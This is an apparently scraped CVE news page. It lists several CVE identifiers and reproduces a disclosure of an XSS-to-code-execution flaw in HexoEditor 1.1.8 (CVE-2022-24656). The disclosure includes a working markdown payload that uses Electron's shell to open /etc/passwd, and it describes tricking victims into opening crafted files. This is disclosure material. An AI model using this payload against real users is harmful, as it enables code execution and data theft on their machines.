CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

HexoEditor 1.1.8 is affected by Cross Site Scripting (XSS). By putting a common XSS payload in a markdown file, if opened with the app, will execute several times.

Vulnerability: XSS to code execution  
Version: 1.1.8  
Initially reported: January 3rd, 2018  
Tested on 16.04.1-Ubuntu

    <s <onmouseover="alert(1)"> <s onmouseover="var {shell} = require('electron');
    shell.openExternal('file:/etc/passwd'); alert('XSS to code execution')">Hallo</s>
    

then, if you now hover over the word Hallo, the '/etc/passwd' file and an alert with words “XSS to  
code execution” will pop up:  
![image](https://user-images.githubusercontent.com/19193738/40174856-fcbca0ec-59de-11e8-9f3d-64595f47f479.png)

**Attack vector**: If the victim is forced or tricked into pasting such code or open a crafted file in the markdown editor, it is possible for the attacker to steal user’s data from the computer or perform any actions on the machine on which the application running on.

Headline

CVE-2022-24656: XSS to code execution vulnerability · Issue #3 · zhuzhuyule/HexoEditor

CVE: Latest News